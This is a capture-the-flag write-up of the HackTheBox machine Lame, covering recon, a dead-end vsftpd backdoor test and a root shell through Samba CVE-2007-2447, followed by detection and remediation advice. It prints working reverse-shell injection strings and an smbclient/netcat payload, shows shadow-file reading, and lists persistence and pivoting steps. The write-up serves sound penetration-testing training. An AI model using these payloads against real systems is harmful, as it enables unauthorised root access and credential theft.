Overview
Lame is the first machine ever released on HackTheBox, and it carries more
instructional weight than its “easy” rating suggests. The box presents two
network services with well-documented vulnerabilities — vsftpd 2.3.4 (the
infamous backdoor) and Samba 3.0.20 (CVE-2007-2447, a command injection in
the username map script configuration). The vsftpd path is a deliberate
red herring; the Samba vector delivers unauthenticated root in a single step.
What makes Lame valuable isn’t the exploitation — it’s the decision-making. Recognising which vulnerability is exploitable in context, rather than mechanically firing every module in the database, is the difference between a penetration tester and someone running scripts.
Reconnaissance
I start with a service-version scan to fingerprint what’s listening and let nmap’s default scripts run for low-hanging fruit:
nmap -sC -sV -oA scans/lame 10.129.18.41| Port | Service | Product / Version | Notes |
|---|---|---|---|
| 21 | FTP | vsftpd 2.3.4 | Anonymous login permitted |
| 22 | SSH | OpenSSH 4.7p1 Debian 8ubuntu1 | Banner leaks distro: Ubuntu Hardy |
| 139 | NetBIOS-SSN | Samba smbd 3.0.20-Debian | Workgroup: WORKGROUP |
| 445 | SMB | Samba smbd 3.0.20-Debian | Same Samba instance |
Four services, two interesting version strings. The SSH banner
(OpenSSH 4.7p1 Debian 8ubuntu1) places this squarely on Ubuntu 8.04 Hardy
Heron — a distribution that went end-of-life in May 2013. That context matters:
any software on this host is frozen at 2008-era patch levels.
Attack Surface Analysis
Two services warrant deeper investigation. I deliberately evaluate both before touching Metasploit.
vsftpd 2.3.4 — the backdoor that isn’t
This version of vsftpd is famous for containing a backdoor introduced via a
compromised source tarball in July 2011. The trigger is elegant in its
simplicity: a username ending in :) (a smiley face) causes the daemon to open
a bind shell on port 6200.
The vulnerability is real (CVE-2011-2523), but on this box, the backdoor trigger connects to port 6200 and the connection hangs. No shell. This is intentional — the HTB authors patched or firewalled the backdoor to teach exactly this lesson: version matching alone is not vulnerability confirmation. A service can run a vulnerable version with the specific flaw mitigated, patched, or blocked at the network layer.
I confirm the dead end quickly with a manual test rather than burning time on
Metasploit’s vsftpd_234_backdoor module:
nc 10.129.18.41 21
# 220 (vsFTPd 2.3.4)
USER user:)
# 331 Please specify the password.
PASS pass
# [hangs — no shell on 6200]Moving on.
Samba 3.0.20 — CVE-2007-2447
Samba 3.0.20 through 3.0.25rc3 is vulnerable to CVE-2007-2447, a command
injection in the username map script functionality. When the username map script smb.conf option is enabled, Samba passes the username provided during
SMB session negotiation to /bin/sh via a popen() call for mapping purposes.
The username is not sanitised, so shell metacharacters in the username field
execute arbitrary commands as the Samba process owner — which, on most
deployments of this era, is root.
| Attribute | Value |
|---|---|
| CVE | CVE-2007-2447 |
| CVSS v2 | 6.0 (Medium) — AV:N/AC:M/Au:S/C:P/I:P/A:P |
| CWE | CWE-78 (OS Command Injection) |
| Root cause | Unsanitised user input passed to popen() via username map script |
| Affected | Samba 3.0.0 — 3.0.25rc3 |
| Fixed in | Samba 3.0.25 |
| MITRE ATT&CK | T1059.004 (Command and Scripting Interpreter: Unix Shell) |
The CVSS score is misleadingly moderate because the v2 vector assumes
authentication is required (Au:S). In practice, the injection occurs
during the authentication handshake — before credentials are validated — making
it effectively unauthenticated. This is a case where the CVSS score
undersells the actual risk.
Vulnerability Analysis
The vulnerability lives in Samba’s smbd daemon. When a client initiates an
SMB session, it sends a Session Setup AndX request containing a username. If
username map script is configured in smb.conf, Samba invokes the specified
script with the supplied username as an argument:
// Simplified from source — actual path: source/smbd/map_username.c
popen("/bin/sh -c 'echo \"%s\" | /etc/samba/usermap.sh'", username);The double quotes around %s are meant to contain the username, but backtick
and $() shell substitution bypass this trivially. Injecting:
"/=`nohup mkfifo /tmp/f; nc LHOST LPORT < /tmp/f | /bin/sh > /tmp/f 2>&1`"as the username causes the Samba process to execute a reverse shell. The
nohup ensures the shell survives even if the parent SMB session handler
terminates.
This is a textbook CWE-78 violation: user-controlled input flows directly into
a shell command without sanitisation or parameterisation. The fix in Samba
3.0.25 adds proper escaping of shell metacharacters before the popen() call.
Exploitation
I use Metasploit here because the module is reliable and well-tested, but the
underlying exploit is simple enough to reproduce manually with netcat and
smbclient:
msfconsole -q
use exploit/multi/samba/usermap_script
set RHOSTS 10.129.18.41
set LHOST tun0
run[*] Started reverse TCP handler on 10.10.14.x:4444
[*] Command shell session 1 opened (10.10.14.x:4444 -> 10.129.18.41:xxxxx)Alternatively, without Metasploit — a manual approach using smbclient to
trigger the injection:
# Start listener
nc -lvnp 4444
# Trigger injection via smbclient
smbclient //10.129.18.41/tmp \
--option='client min protocol=NT1' \
-U './=`nohup nc -e /bin/sh 10.10.14.x 4444`'Both methods yield a root shell immediately. No privilege escalation required — the Samba daemon runs as root.
Post-Exploitation
With root access, I enumerate the system to understand what a real attacker would find:
id
# uid=0(root) gid=0(root)
uname -a
# Linux lame 2.6.24-16-server #1 SMP x86_64 GNU/Linux
cat /etc/shadow | head -5
# root:$1$[hash]:14044:0:99999:7:::
# [...]
# makis:$1$[hash]:14044:0:99999:7:::The password hashes use MD5 ($1$) — crackable in seconds with modern
hardware. In a real engagement, I’d extract these for offline cracking and
check for credential reuse across the network.
cat /home/makis/user.txt
# [redacted]
cat /root/root.txt
# [redacted]What a real attacker does next
This box has limited lateral movement potential in the HTB lab context, but in a production network, the post-exploitation checklist would include:
- Credential harvesting:
/etc/shadowhashes, SSH keys in/home/*/.ssh/, Samba password database (/var/lib/samba/passdb.tdb) - Network reconnaissance:
arp -a,netstat -tlnp, internal DNS records - Persistence: SSH key injection, cron job, modified PAM configuration
- Pivot: Use this host as a jump box to reach internal subnets not directly accessible from the attacker’s network
Defensive Analysis
Detection opportunities
| Phase | MITRE ATT&CK | Detection |
|---|---|---|
| Initial access | T1190 | IDS signature for shell metacharacters in SMB username fields |
| Execution | T1059.004 | Syslog entries showing /bin/sh spawned by smbd |
| C2 | T1571 | Outbound connection from smbd process to non-standard port |
Network-level: Snort/Suricata can detect this with a rule matching backtick
or $() patterns in SMB Session Setup AndX username fields. The Metasploit
module’s traffic is distinctive — the username field contains obvious shell
syntax that no legitimate SMB client would produce.
Host-level: Any process monitoring tool (Sysmon for Linux, auditd) would
flag /bin/sh being spawned as a child of smbd. In a properly instrumented
environment, this is a high-fidelity alert.
Log artefacts: Samba’s own logs (at log level = 3 or higher) record the
username from the session setup request, which would contain the injection
payload in cleartext.
Remediation
| Priority | Action | Effort | Impact |
|---|---|---|---|
| P0 | Upgrade Samba to 3.0.25+ (or current stable) | Low | Critical |
| P0 | Upgrade Ubuntu from 8.04 to a supported release | High | Critical |
| P1 | Disable username map script if not required | Low | High |
| P1 | Run Samba as a non-root user | Medium | High |
| P2 | Block SMB (139/445) at the perimeter firewall | Low | Medium |
| P2 | Deploy network IDS with SMB protocol inspection | Medium | Medium |
| P3 | Migrate from MD5 password hashes to SHA-512 | Low | Medium |
The deeper issue here isn’t the CVE — it’s the operating system. Ubuntu 8.04 has been unsupported for over a decade. Every package on this host is frozen at 2008 patch levels, meaning the attack surface extends far beyond Samba. The correct remediation isn’t “patch Samba” — it’s “decommission or rebuild this host on a supported distribution.”
For organisations that genuinely cannot upgrade legacy systems (OT environments, regulatory constraints), compensating controls must include: network isolation (VLAN segmentation with strict ACLs), protocol-level monitoring (SMB deep packet inspection), and application-layer firewalling that blocks anomalous SMB session parameters.
Key Takeaways
-
Version matching is necessary but not sufficient. vsftpd 2.3.4 is “vulnerable” by CVE database lookup, but the backdoor is non-functional on this host. Confirming exploitability in context — not just version presence — is what separates penetration testing from vulnerability scanning.
-
CVSS scores can mislead. CVE-2007-2447 scores 6.0 (Medium) because the v2 vector assumes authentication is required. The actual exploitation path is unauthenticated. Always read the technical details behind the score.
-
Command injection via configuration features is a recurring pattern. The
username map scriptflaw is architecturally similar to Shellshock (CGI handlers passing unsanitised input to bash), Log4Shell (JNDI lookups in log messages), and countless other vulnerabilities where a “feature” inadvertently creates a code execution path. The lesson: any configuration option that invokes a shell with user-controlled input is a latent vulnerability.